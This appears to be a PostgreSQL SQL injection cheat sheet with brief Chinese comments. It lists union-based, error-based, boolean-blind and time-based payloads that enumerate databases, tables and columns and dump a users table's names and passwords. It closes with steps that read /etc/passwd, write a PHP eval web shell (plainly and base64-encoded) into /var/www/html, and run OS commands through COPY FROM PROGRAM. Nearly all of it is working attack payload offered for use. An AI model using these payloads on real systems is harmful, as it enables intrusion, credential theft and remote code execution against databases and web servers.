select version();
show server_version;
SHOW server_version_num;
select current_setting('server_version_num')::integer;

select user;
select * from current_user;

select name,setting from pg_settings;

select current_database();

select schemaname from pg_tables group by schemaname;

select * from pg_tables;

select tablename from pg_tables where schemaname='public';

select tablename from pg_tables where tablename NOT LIKE 'pg%' and tablename NOT LIKE 'sql_%' ORDER BY tablename

-- 单行注释
/*
* 多行
*/

select table_name from pg_tables where schemaname='public' limit 1 offset 0
/*查询第一个表
limit 1 offset 1 查询第二个
*/

1 +and+1::=1--

1 union select '1', '2', '3', '4'--

-1 union select '1', current_database(), '3', '4'--

-1 union select '1',string_agg(datname,'~'),'3','4' from pg_database()--

select schemaname from pg_tables group by schemaname;

-1 union select '1',string_agg(table_name,'~'),'3','4' from information_schema.tables where table_schema='public'--

-1 union select '1',string_agg(table_name,'~'),'3','4' from pg_tables where schemaname='public'--

-1 union select '1',string_agg(column_name,'~'),'3','4' from information_schema.columns where table_name='xxx'--

SELECT attname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='user_tbl' AND nspname='public';

-1 union select '1', string_agg(xxx, '~'),'3','4' from xxx

select CAST((SELECT current_database())::text AS NUMERIC);

id= admin' and 1=cast((select version())::text AS NUMERIC)--

id= admin' and 1=cast((select string_agg(datname,'~') from pg_database)::text AS NUMERIC)--

id= admin' and 1=cast((select current_database())::text AS NUMERIC)--

id= admin' and 1=cast((select string_agg(table_name,'~') from pg_tables where schemaname='public')::text AS NUMERIC)--

id= admin' and 1=cast((select string_agg(table_name,'~') from information_schema.tables where table_schema='public')::text AS NUMERIC)--

id= admin' and 1=cast((select string_agg(column_name,'~') from information_schema.columns where table_name='xxx')::text AS NUMERIC)--

id= admin' and 1=cast((select string_agg(xxx,'~',xxx) from xxx)::text AS NUMERIC)--

admin' and 1=cast((select name||'::'||password from public.users limit 1 offset 0) as numeric)--

1' and length(current_database())<xxx--

1' and ascii(substr(current_database(),1,1))<xxx--

1' and ascii(substr((select string_agg(table_name) from information_schema.tables where table_schema='public'),1,1))<xxx--

1' and ascii(substr((select string_agg(column_name) from information_schema.columns where table_name='xxx'),1,1))<xxx--

1' and ascii(substr((select string_agg(xxx) from xxx),1,1))<xxx--

查库：
1 and (case when(ascii(substr((select datname from pg_database limit 1),1,1))=97) then (select 5 from pg_sleep(5)) else 1 end)
 
查表：
1 and (case when(ascii(substr((select relname from pg_stat_user_tables limit 1 offset 0),1,1))=97) then (select 5 from pg_sleep(5)) else 1 end)
 
查列：
1 and (case when(ascii(substr((select column_name from information_schema.columns where table_name="users" limit 1 offset 0),1,1))=97) then (select 5 from pg_sleep(5)) else 1 end)
 
查字段：
1 and (case when(ascii(substr((select password from users limit 1 offset 0),1,1))=97) then (select 5 from pg_sleep(5)) else 1 end)

select pg_ls_dir('./');--要有权限

select pg_read_file('/etc/passwd');

CREATE TABLE passwd(t TEXT);
COPY passwd FROM '/etc/passwd';
select * from passwd;

copy (select '<?php @eval($_POST[1]);?>') to '/var/www/html/shell.php'

select lo_from_bytea(12350,decode('PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4=','base64'));
select lo_export(12350, '/var/www/html/shell.php');
select lo_unlink(12350);

drop table if exists cmd_exec;
create table cmd_exec(cmd_output text);
copy cmd_exec from program 'id';
select cmd_output from cmd_exec;
drop table if exists cmd_exec;